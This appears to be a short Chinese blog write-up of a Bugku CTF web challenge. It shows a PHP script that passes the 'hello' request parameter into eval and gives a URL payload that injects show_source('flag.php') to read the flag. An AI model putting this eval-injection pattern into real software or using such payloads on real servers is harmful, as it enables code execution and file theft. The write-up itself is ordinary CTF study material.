web8---bugku

<?php
    include "flag.php";      ##相当于一个php文件可以被另一个php文件调用
    $a = @$_REQUEST['hello'];      ###HTTP Request 变量，与post和get有相同功能，全局变量，
    eval( "var_dump($a);");，    ##打印变量的相关信息
    show_source(__FILE__);
?>

所以我们需要构建一个hello变量，执行我们查看flag.php文件，所以http://114.67.246.176:16068/?hello=show_source('flag.php')

posted @ 2021-02-25 20:38 网抑云黑胶SVIP用户阅读(43) 评论(0) 编辑收藏举报

刷新页面返回顶部

铁血丹心

web8---bugku

公告